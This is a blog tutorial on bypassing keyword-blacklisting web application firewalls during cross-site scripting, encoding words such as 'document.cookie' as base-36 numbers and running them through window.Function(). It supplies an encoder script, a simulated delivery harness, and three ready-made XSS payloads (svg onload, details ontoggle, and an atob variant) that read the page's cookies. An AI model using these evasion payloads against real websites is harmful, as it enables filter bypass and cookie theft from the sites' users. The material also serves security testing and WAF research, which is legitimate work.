Radix numbers and anonymous functions to bypass some WAFs during XSS

Boulouiz Youssouf
4 min read · Jun 24, 2021


Salam Alaikum,

This is my first article on Medium, where I'll talk about using radix numbers and lambda (anonymous) functions to bypass some WAFs during XSS.

First of all, what is radix?

The radix parameter is used to specify which numeral system is to be used; for example, a radix of 16 (hexadecimal) indicates that the number in the string should be parsed from a hexadecimal number to a decimal number. (w3schools: https://www.w3schools.com/jsref/jsref_parseint.asp)

When do we use a radix number in our case?

We use radix numbers when the WAF blacklists words such as "document.cookie", "alert", "confirm", etc.

How do we use radix in our case?

We can use the browser console to compute the radix number of any word the WAF may block, via the parseInt() function. Example:

parseInt("document", 36) => 1071753937337 <= this is the radix number of the string "document".

parseInt("cookie", 36) => 767051222 <= this is the radix number of the string "cookie".

36 is the radix parameter: an integer in the range 2 through 36 specifying the base to use for representing the numeric value. In base 36 the digits are 0-9 and a-z, so any lowercase word is a valid number; characters outside that set (".", a space, uppercase letters) are not, which is why they are concatenated separately below.

We can concatenate the two numbers to get "document.cookie" back, converting each one to its base-36 string with the toString(36) method:

let payload = 1071753937337n.toString(36)+"."+767051222n.toString(36) // "document.cookie"

The n suffix makes each literal a BigInt, which has its own toString(radix); it also sidesteps a syntax error, since 1071753937337.toString(36) is rejected because the dot is read as a decimal point (wrapping the number in parentheses works too). One limit to keep in mind: parseInt() returns a floating-point Number that is exact only below 2^53, and 36^10 < 2^53 < 36^11, so words longer than 10 characters must be split into shorter chunks or they will not round-trip.

We use a throw statement instead of alert() for the execution PoC: throw document.cookie raises an uncaught exception whose value is the cookie, which shows up in the console.

parseInt("throw", 36) => 49537904

Final payload:

Let's pass the payload string to the eval() function, which executes it as code.
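The encoding steps above, as an added example that is not part of the original article: a small JavaScript encoder that turns a blacklisted lowercase token into the same `<n>n.toString(36)` expression the article builds by hand, plus the two limits worth knowing before relying on it (the base-36 alphabet only covers 0-9 and a-z, and parseInt() is exact only below 2^53). The names MAX_SAFE_CHUNK, BASE36, parseBase36BigInt, parseIntIsExact, radixExpression and decode are mine, and the inputs "localstorage" and "abcdefghijb" are constructed to show chunking and precision loss; it runs in Node or a browser console.

```javascript
// Added example (not from the original article): encoder for the radix
// trick, with the two limits a practitioner runs into in practice.

// parseInt(s, 36) returns a double, which is exact only below 2**53.
// 36**10 < 2**53 < 36**11, so a base-36 string of at most 10 characters
// always round-trips through parseInt()/toString(36); longer words are
// split into chunks of this size.
const MAX_SAFE_CHUNK = 10;

// toString(36) only emits [0-9a-z]. Uppercase letters, ".", " " and
// punctuation cannot be encoded this way and are emitted as string
// literals between the numeric pieces instead.
const BASE36 = /^[0-9a-z]+$/;

// Exact base-36 parse with BigInt arithmetic, so it never rounds.
function parseBase36BigInt(s) {
  if (!BASE36.test(s)) {
    throw new Error(`not a base-36 string: ${JSON.stringify(s)}`);
  }
  let acc = 0n;
  for (const ch of s) acc = acc * 36n + BigInt(parseInt(ch, 36));
  return acc;
}

// True when parseInt() reproduces the exact value of the word, i.e. the
// plain Number path is safe; false once the value exceeds 2**53.
function parseIntIsExact(word) {
  return BigInt(parseInt(word, 36)) === parseBase36BigInt(word);
}

// Builds e.g. '49537904n.toString(36)+" "+1071753937337n.toString(36)+...'
// for the token "throw document.cookie". The n suffix makes each literal a
// BigInt, so .toString(36) can follow it directly and the decoding side
// has no 2**53 limit either.
function radixExpression(token) {
  const parts = [];
  let i = 0;
  while (i < token.length) {
    let j = i;
    if (BASE36.test(token[i])) {
      while (j < token.length && BASE36.test(token[j]) && j - i < MAX_SAFE_CHUNK) j++;
      const chunk = token.slice(i, j);
      // A chunk starting with "0" would come back without that zero.
      if (chunk[0] === '0') throw new Error(`chunk "${chunk}" would lose its leading zero`);
      parts.push(`${parseBase36BigInt(chunk)}n.toString(36)`);
    } else {
      while (j < token.length && !BASE36.test(token[j])) j++;
      parts.push(JSON.stringify(token.slice(i, j)));
    }
    i = j;
  }
  return parts.join('+');
}

// Decodes an expression the way the target page would: by evaluating it.
function decode(expr) {
  return Function(`return (${expr})`)();
}
```

radixExpression('throw document.cookie') yields exactly the expression used in the article's final payload, and decode() evaluates it the way the target page would. For a word of 11 or more characters, parseIntIsExact() shows where the Number path breaks and parseBase36BigInt() is the exact alternative; radixExpression() avoids the problem by chunking.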

Where do we use this format of strings?

You can use it when some words such as "cookie" are blacklisted and you cannot use String.fromCharCode(), or cannot use atob() because the input is converted to lowercase (base64 is case sensitive, so a lowercased string no longer decodes to the original). Keep in mind that this payload still needs its own mixed case to survive (toString, Function): it helps when the filter lowercases only its own copy for matching, not when the application lowercases what it reflects into the page.

So check that the toString() method is not blacklisted and formulate your payload as shown.

What is an anonymous function?

An anonymous function is a function without a name. It is often not accessible after its initial creation, but it can be assigned to a variable, as below, or invoked immediately where it is defined.

let anon = function () {
console.log('Anonymous function')
};
anon(); // Anonymous function

There are several syntaxes for creating an anonymous function.

The trailing parentheses () call the function immediately (an IIFE):

(function () {
console.log('Immediately invoked function execution');
})();

In our case we will use window.Function() (the Function constructor, also reachable as plain Function()), which lets us do without eval(): eval is on most WAF blacklists, while Function() usually is not.

window.Function() (the Function constructor) takes the body of a function as a string and returns a new anonymous function without running it. For example:

window.Function("alert(1)"); // returns:
ƒ anonymous() {
alert(1)
}

As shown, this method returns an anonymous function; nothing is executed until that function is called.

As we said above, we can pass our radix chain to this method and get the anonymous function returned.

Alternatively, pass atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ==") (which decodes to alert(document.cookie)) as the parameter of Function() if there are no issues with atob() or with the base64 format.

The last thing: we invoke the function immediately by adding () at the end :)

Our final payloads:

<svg/onload='window.Function(49537904n.toString(36)+" "+1071753937337n.toString(36)+"."+767051222n.toString(36))()'>

<details/open/ontoggle%3d"window.Function(49537904n.toString(36)+' '+1071753937337n.toString(36)+'.'+767051222n.toString(36))()">

<details/open/ontoggle%3d"window.Function(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))()">

The first two end up running throw document.cookie, the third alert(document.cookie).
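The delivery side described above, as an added example that is not part of the original article: it models the keyword blacklist the article assumes, shows what the Function constructor does with the decoded string and how that differs from eval(), and runs the throw-based PoC against constructed window and document globals so the result can be seen outside a browser. BLACKLIST, blacklistHits, decodedBody, compiledSource, scopeDifference, runHandler and base64Decode are my names, the blacklist itself and the cookie value are constructed, and the handler strings are the article's own payload values.

```javascript
// Added example (not from the original article): the delivery side of the
// payload, run in Node with constructed stand-ins for the browser globals.

// Constructed stand-in for a keyword-blacklisting WAF rule (case-insensitive
// substring match). Real products do far more; this is only the behaviour
// the technique relies on.
const BLACKLIST = ['alert', 'confirm', 'document', 'cookie', 'eval'];

function blacklistHits(input) {
  const lower = input.toLowerCase();
  return BLACKLIST.filter((word) => lower.includes(word));
}

// The onload/ontoggle value from the article's final payload. The numbers
// are the radix-36 values of "throw", "document" and "cookie".
const RADIX_HANDLER =
  'window.Function(49537904n.toString(36)+" "+1071753937337n.toString(36)+"."+767051222n.toString(36))()';

// The plain handler it stands in for.
const PLAIN_HANDLER = 'window.Function("throw document.cookie")()';

// The argument expression is evaluated by the event handler first, so
// Function() receives this plain string as the function body.
function decodedBody() {
  return 49537904n.toString(36) + ' ' + 1071753937337n.toString(36) + '.' + 767051222n.toString(36);
}

// Function(body) compiles the body into a new anonymous function without
// running it; the trailing () in the payload is what runs it.
function compiledSource(body) {
  return Function(body).toString();
}

// eval() sees the caller's local variables; a Function()-built function
// sees only globals. Payloads built this way must reference globals such
// as document, which is exactly what "throw document.cookie" does.
function scopeDifference() {
  const localSecret = 'only visible to eval';
  const viaEval = eval('typeof localSecret');
  const viaFunction = Function('return typeof localSecret')();
  return { viaEval, viaFunction };
}

// Runs a handler string with constructed window/document globals standing
// in for the browser (installed only when no real DOM is present). The PoC
// throws the cookie value as an exception, which is what the console shows.
function runHandler(handler, cookie) {
  if (typeof globalThis.window === 'undefined') globalThis.window = globalThis;
  if (typeof globalThis.document === 'undefined' || globalThis.document.constructed) {
    globalThis.document = { cookie, constructed: true };
  }
  try {
    Function(handler)();
    return { threw: false, value: undefined };
  } catch (e) {
    return { threw: true, value: e };
  }
}

// The atob() variant from the article. Base64 is case sensitive, so a
// lowercased copy of the string decodes to different bytes.
function base64Decode(b64) {
  return typeof atob === 'function' ? atob(b64) : Buffer.from(b64, 'base64').toString('latin1');
}
```

blacklistHits() catches the plain handler on "document" and "cookie" but finds nothing in the radix handler, because that string contains only digits, quotes and the identifiers toString and Function. runHandler(RADIX_HANDLER, 'session=abc') returns the thrown cookie value, which is the whole point of using throw as the PoC instead of alert.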

That's all, hope you enjoyed the reading ^_^

Regards,

Youssouf BOULOUIZ


Null Pentester , IoT Developer, love bypassing security, Working as Application security Engineer